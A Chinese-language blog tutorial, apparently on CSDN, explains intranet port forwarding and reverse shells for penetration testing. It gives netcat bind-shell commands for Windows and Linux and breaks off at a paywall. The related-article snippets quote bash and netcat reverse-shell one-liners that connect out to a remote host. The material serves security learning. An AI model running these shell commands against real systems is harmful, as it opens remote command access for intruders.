内网转发——反弹shell

最新推荐文章于 2024-05-25 23:33:58 发布
最新推荐文章于 2024-05-25 23:33:58 发布
阅读量1k 收藏 3
点赞数
分类专栏: 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxrpty/article/details/104906657
版权

内网转发的目的:

渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。

代理方式:

正向代理:正向代理是服务器开放端口,客户端主动访问服务器的端口。正向代理的过程是它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。

   

反向代理:反向代理是客户端开发端口,服务器连接客户端。反向代理是相对于服务器而言的,当我们请求 www.baidu.com 的时候,背后可能有成千上万台服务器为我们服务,但具体是哪一台,不需要知道,你只需要知道反向代理服务器是谁就好了,www.baidu.com 就是我们的反向代理服务器,反向代理服务器会帮我们把请求转发到真实的服务器那里去,比如说负载均衡

内网转发的三种形式:

1.反弹shell:在攻击者机器,获取受害者机器的命令行

2.反弹端口:受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口,也叫端口转发

3.反弹代理:将攻击者的流量转发到内网其他服务器上

实验一:利用nc工具反弹shell

实验环境:win2008、win2010

实验步骤:

一、利用nc正向连接shell

1.将被控服务器shell反弹到本地的4444端口,并监听4444端口,受害者输入以下命令;

nc -lvp 4444 -e cmd.exe      (反弹windows shell)
nc -lvp 4444 -e /bin/bash     (反弹linux shell)

本实验以windows为例:

2.攻击机连接被控服务器的4444端口,攻击者输入:

nc -vv 受害机ip 4444

  

  

二、利用nc反弹shell

1.攻击机监听4444端

最低0.47元/天 解锁文章
没有如果ru果
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4623
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
渗透测试之内渗透(四):端口转发
m0_74131821的博客
04-26 1916
在真实的错综复杂的企业环境中进行内渗透,涉及内穿透,端口转发,域渗透,提权等一系列的难题
linux 反弹shell,安全实验室 | 内渗透—利用WinRM实现端口复用&反弹SHELL
weixin_39539807的博客
05-13 418
WinRM(Windows Remote Management)是Windows远程管理的简称,WinRM基于Web服务管理(WS-Management)标准,使用80和443端口,可以在对方开启防火墙的情况下远程管理目标机。在Windows Server 2008 R2以上的系统中都默认开启该服务。如果防御者配置不当,攻击者在内渗透中很可能会利用WinRM实现端口复用,进而实现内无文件攻击反...
msfconsole的简单使用
m0_53603468的博客
12-30 8555
文章目录前言一、入侵步骤二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsole、msfweb、msfupdate。msfupdate用于软件更新,建议使用前先进行更新,可以更新最新的漏洞库和利用代码。msfconsole 是整个框架中最受欢迎的模块,个人感觉也是功能强大的模块,所有的功能都可以该模块下运行。msfweb 是Metasploit framew.
Msfconsole工具使用教程
最新发布
shen213254149的博客
05-25 1450
Msfconsole是Metasploit Framework的一个核心组件,这是一个广泛使用的渗透测试框架。Metasploit是一个开源平台,旨在帮助安全研究人员和渗透测试人员识别、研究和利用安全漏洞。1.2漏洞利用(Exploits):Msfconsole包含了大量预构建的漏洞利用模块,这些模块可以针对已知的安全漏洞发起攻击,以测试目标系统是否存在这些漏洞。
渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
LCX内转发工具LCX可转发
12-29
两个,一个免杀,一个不免,不是一个版本。自己测试。
Frp内穿透——frps服务端部署
01-20
本次带大家了解一下frp内穿透的服务端教学,让你也能够部署一个内穿透服务。 frp简介 通俗的说,frp是一个反向代理软件,它不仅轻量且功能很强大,可以使处于内或防火墙后的设备对外界提供服务,它支持HTTP、...
游走于内之后——工控安全那些事儿.pdf
08-08
目录 1 工控安全之背景 2 工控安全之现状 3 工控安全之我见 4 工控安全之CTF
后渗透——内转发之利用ftp实现文件传输
01-09
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于...
Socks代理反弹突破内
不懂
09-19 960
随着信息安全意识的提升,越来越多的信息系统前端均部署有防火墙,系统管理员根据业务需求将内部必要的服务端口通过端口映射等手段映射到公中,如默认web服务端口80、MSSQL数据库服务端口1433等。通过部署防火墙可以将信息系统内部区域与公逻辑隔离开来,利用相关的策略有效避免或减轻来自外部的攻击。对于渗透测试者来说,如何绕过防火墙的阻挡在内展开渗透测试成为亟需解决的问题,本文介绍了在夺取映射到...
ssh隧道转发穿透功能实现(反弹式木-马原理)
weixin_34390105的博客
04-21 705
ssh说明 SSH(secure shell)是一种加密的络传输协议,可在不安全的络中为络服务提供安全的传输环境(这点很重要);SSH通过在络中创建安全隧道来实现SSH客户端与服务器之间的连接。人们通常利用SSH来传输命令行界面和远程执行命令;SSH也支持隧道协议、端口映射和X11连接。借助SFTP或SCP协议还可以传输文件等;闲话不说了,如需要详细了解ssh请自行搜索;我们通常接触最多的...
大厂与小厂招人的区别,看完多少有点不敢相信
kk_lzvvkpj的博客
12-27 7418
前两天在头条发了一条招人的感慨,关于大厂招人和小公司招人的区别。:有影响力,有钱,能够吸引了大量的应聘者。因此,也就有了筛选的资格,比如必须985名校毕业,必须35岁以下,不能5年3跳,必须这个……不能那个……当员工不合适时,绩效分给的低点或直接赔钱让其出局。:没有品牌,资金有限,每一分钱都要精打细算。招聘的人选有限,在这有限的选择范围内,还要考虑成本、能不能用、能不能留住等问题。能力太强,给不起钱,留不住;能力太弱,只会让项目越来越糟糕;所以,最好的选择只能是稍微高于现有团队能力,又不至于轻易跳槽的人。
端口映射后的公反弹shell
来到了学渣的博客
04-01 3052
前言: 渗透一个站最后获取该web服务器权限的时候,可能会思考,如何把公的IP反弹到自己内(私有ip)的虚拟机上?这时候我们就需要把内的ip和端口映射成一个公的ip和端口从而实现内穿透。 这里我用的是NATAPP,一个基于ngrok的国内高速内转发工具 https://natapp.cn/register 首先快速注册,然后购买免费隧道(非常适合我这样的穷学生) 我这里用的是TC...
代理转发工具
tomyyyyy
12-09 3653
目录概念区分端口转发端口映射代理隧道端口转发工具概念讲解socket端口转发socks代理两者的异同端口转发常用工具msf反弹木马lcxportmapssh端口转发iptables 端口转发firewall 端口转发socks代理工具基于web服务的socks5工具reGeorgTunna能够进行多层代理的工具Earthworm(又称ew)Termitevenomfuso多功能型的代理工具frp...
Kali Metasploit工具简介
董哥的黑板报
07-24 4907
一、Metasploit的历史 在没有漏洞渗透工具框架的时候,渗透测试者往往需要自己收集漏洞渗透用代码,甚至自己编写针对漏洞用的代码,这个时期的渗透测试效率比较低 2003年左右,美国的H.D Moore和Spoonm创建了一个继承了多个漏洞渗透工具的框架。随后,这个框架在2004年的世界黑客交流会(Black Hat Briefings)上备受关注,Spoonm在大会的演讲中提到,Metas...
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 1905
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
linux内渗透反弹shell
08-03
在Linux内渗透中,反弹shell是一种常见的技术手段。其中,Bash反弹shell是最简单且最常见的一种方式。首先,在攻击机上使用nc命令监听一个端口。然后,在目标机器上使用Python脚本去反向连接攻击机的IP和端口。这样,攻击机的终端就可以获得目标机器的shell。除了Bash反弹shell,还可以使用Kali的MSF框架生成木马来反弹shell。此外,在内渗透中,还经常涉及端口转发和正向代理的概念。这些技术手段可以帮助渗透测试人员在内环境中获取更多的权限和信息。[1][2][3]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值